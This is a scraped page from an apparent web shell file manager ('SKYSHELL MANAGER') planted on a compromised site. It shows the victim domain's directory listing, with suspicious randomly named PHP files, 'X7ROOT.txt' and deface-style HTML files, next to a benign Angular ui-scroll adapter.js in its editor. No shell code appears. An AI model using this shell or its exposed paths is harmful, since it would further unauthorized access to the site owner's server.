📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: adapter.js
function getCtrlOnData(attr, element) { let onSyntax = attr.match(/^(.+)(\s+on\s+)(.+)?/); if (onSyntax && onSyntax.length === 4) { window.console.log('Angular ui-scroll adapter assignment warning. "Controller On" syntax has been deprecated since ui-scroll v1.6.1.'); let ctrl = onSyntax[3]; let tail = onSyntax[1]; let candidate = element; while (candidate.length) { let candidateScope = candidate.scope(); // doesn't work when debugInfoEnabled flag = true let candidateName = (candidate.attr('ng-controller') || '').match(/(\w(?:\w|\d)*)(?:\s+as\s+(\w(?:\w|\d)*))?/); if (candidateName && candidateName[1] === ctrl) { return { target: candidateScope, source: tail }; } candidate = candidate.parent(); } throw new Error('Angular ui-scroll adapter assignment error. Failed to locate target controller "' + ctrl + '" to inject "' + tail + '"'); } } class Adapter { constructor(viewport, buffer, adjustBuffer, reload, $attr, $parse, element, $scope) { this.viewport = viewport; this.buffer = buffer; this.adjustBuffer = adjustBuffer; this.reload = reload; this.isLoading = false; this.disabled = false; const viewportScope = viewport.getScope(); this.startScope = viewportScope.$parent ? viewportScope : $scope; this.publicContext = {}; this.assignAdapter($attr.adapter, $parse, element); this.generatePublicContext($attr, $parse); } assignAdapter(adapterAttr, $parse, element) { if (!adapterAttr || !(adapterAttr = adapterAttr.replace(/^\s+|\s+$/gm, ''))) { return; } let ctrlOnData = getCtrlOnData(adapterAttr, element); let adapterOnScope; try { if (ctrlOnData) { // "Controller On", deprecated since v1.6.1 $parse(ctrlOnData.source).assign(ctrlOnData.target, {}); adapterOnScope = $parse(ctrlOnData.source)(ctrlOnData.target); } else { $parse(adapterAttr).assign(this.startScope, {}); adapterOnScope = $parse(adapterAttr)(this.startScope); } } catch (error) { error.message = `Angular ui-scroll Adapter assignment exception.\n` + `Can't parse "${adapterAttr}" expression.\n` + error.message; throw error; } angular.extend(adapterOnScope, this.publicContext); this.publicContext = adapterOnScope; } generatePublicContext($attr, $parse) { // these methods will be accessible out of ui-scroll via user defined adapter const publicMethods = ['reload', 'applyUpdates', 'append', 'prepend', 'isBOF', 'isEOF', 'isEmpty']; for (let i = publicMethods.length - 1; i >= 0; i--) { this.publicContext[publicMethods[i]] = this[publicMethods[i]].bind(this); } // these read-only props will be accessible out of ui-scroll via user defined adapter const publicProps = ['isLoading', 'topVisible', 'topVisibleElement', 'topVisibleScope']; for (let i = publicProps.length - 1; i >= 0; i--) { let property, attr = $attr[publicProps[i]]; Object.defineProperty(this, publicProps[i], { get: () => property, set: (value) => { property = value; this.publicContext[publicProps[i]] = value; if (attr) { $parse(attr).assign(this.startScope, value); } } }); } // non-read-only public property Object.defineProperty(this.publicContext, 'disabled', { get: () => this.disabled, set: (value) => (!(this.disabled = value)) ? this.adjustBuffer() : null }); } loading(value) { this['isLoading'] = value; } isBOF() { return this.buffer.bof; } isEOF() { return this.buffer.eof; } isEmpty() { return !this.buffer.length; } applyUpdates(arg1, arg2) { if (angular.isFunction(arg1)) { // arg1 is the updater function, arg2 is ignored this.buffer.slice(0).forEach((wrapper) => { // we need to do it on the buffer clone, because buffer content // may change as we iterate through this.applyUpdate(wrapper, arg1(wrapper.item, wrapper.scope, wrapper.element)); }); } else { // arg1 is item index, arg2 is the newItems array if (arg1 % 1 !== 0) {// checking if it is an integer throw new Error('applyUpdates - ' + arg1 + ' is not a valid index'); } const index = arg1 - this.buffer.first; if ((index >= 0 && index < this.buffer.length)) { this.applyUpdate(this.buffer[index], arg2); } } this.adjustBuffer(); } append(newItems) { this.buffer.append(newItems); this.adjustBuffer(); } prepend(newItems) { this.buffer.prepend(newItems); this.adjustBuffer(); } calculateProperties() { let item, itemHeight, itemTop, isNewRow, rowTop = null; let topHeight = 0; for (let i = 0; i < this.buffer.length; i++) { item = this.buffer[i]; itemTop = item.element.offset().top; isNewRow = rowTop !== itemTop; rowTop = itemTop; if (isNewRow) { itemHeight = item.element.outerHeight(true); } if (isNewRow && (this.viewport.topDataPos() + topHeight + itemHeight <= this.viewport.topVisiblePos())) { topHeight += itemHeight; } else { if (isNewRow) { this['topVisible'] = item.item; this['topVisibleElement'] = item.element; this['topVisibleScope'] = item.scope; } break; } } } applyUpdate(wrapper, newItems) { if (!angular.isArray(newItems)) { return; } let keepIt; let pos = (this.buffer.indexOf(wrapper)) + 1; newItems.reverse().forEach((newItem) => { if (newItem === wrapper.item) { keepIt = true; pos--; } else { this.buffer.insert(pos, newItem); } }); if (!keepIt) { wrapper.op = 'remove'; } } } export default Adapter;
Save